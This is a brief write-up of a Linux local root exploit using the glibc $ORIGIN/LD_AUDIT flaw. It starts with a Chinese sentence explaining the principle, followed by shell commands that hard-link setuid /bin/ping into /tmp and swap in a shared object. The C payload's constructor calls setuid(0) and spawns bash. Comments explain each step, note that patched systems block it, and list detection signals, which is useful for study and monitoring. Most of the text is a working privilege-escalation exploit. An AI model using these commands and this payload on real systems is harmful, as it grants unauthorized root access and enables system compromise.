原理：在 Linux 中，/tmp 的权限是 777（任何用户可写）；利用 suid 机制，
将一个带有 suid 权限的可执行文件 /bin/ping 硬链接到 /tmp 目录下的一个文件。
# Hard-link the setuid binary named above (/bin/ping) into a directory the
# current user owns under world-writable /tmp.  Kernels with the
# fs.protected_hardlinks sysctl enabled refuse this link, since the caller
# neither owns /bin/ping nor may write to it.
cd /tmp/
mkdir exploit
ln /bin/ping /tmp/exploit/target
# Keep an open descriptor to the linked file so it stays reachable via
# /proc/self/fd/3 after its directory is deleted on the next line.
exec 3< /tmp/exploit/target
# Removing the directory frees the path name /tmp/exploit, which the gcc line
# below then reuses for a shared object.  The executable's $ORIGIN (the
# directory it was started from) therefore now names that shared object.
rm -fr /tmp/exploit/
# -w silences all warnings; payload.c (below) includes no headers, so without
# -w gcc would report setuid()/system() as implicitly declared.
gcc -w -fPIC -shared -o /tmp/exploit payload.c
# A vulnerable dynamic loader honored LD_AUDIT for a setuid program and
# expanded $ORIGIN in it, so it mapped /tmp/exploit (the shared object) into
# the privileged process.  Patched glibc ignores LD_AUDIT and does not expand
# $ORIGIN for setuid/AT_SECURE programs, so this step fails there.  For
# monitoring: LD_AUDIT set in the environment of a setuid process, hard links
# to setuid binaries under /tmp, and shared objects written to world-writable
# directories are the observable signals of this technique.
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
# Source of the shared object compiled on the gcc line above (the write-up lists
# it after the line that consumes it).
vim /tmp/payload.c
/* Constructor of the shared object built by the gcc line above.  The dynamic
 * loader runs constructors when the object is mapped, before the host
 * program's main(), so this executes inside the setuid process.  No headers
 * are included: setuid() (<unistd.h>) and system() (<stdlib.h>) are implicitly
 * declared, which only compiles quietly because of -w. */
void __attribute__((constructor)) init()
{
/* Only succeeds when the process already has euid 0 (the setuid ping);
 * otherwise it fails and the shell below runs unprivileged. */
setuid(0);
/* system() runs "/bin/sh -c /bin/bash".  A setuid ping spawning /bin/sh with
 * LD_AUDIT in its environment is the process-tree signature to alert on. */
system("/bin/bash");
}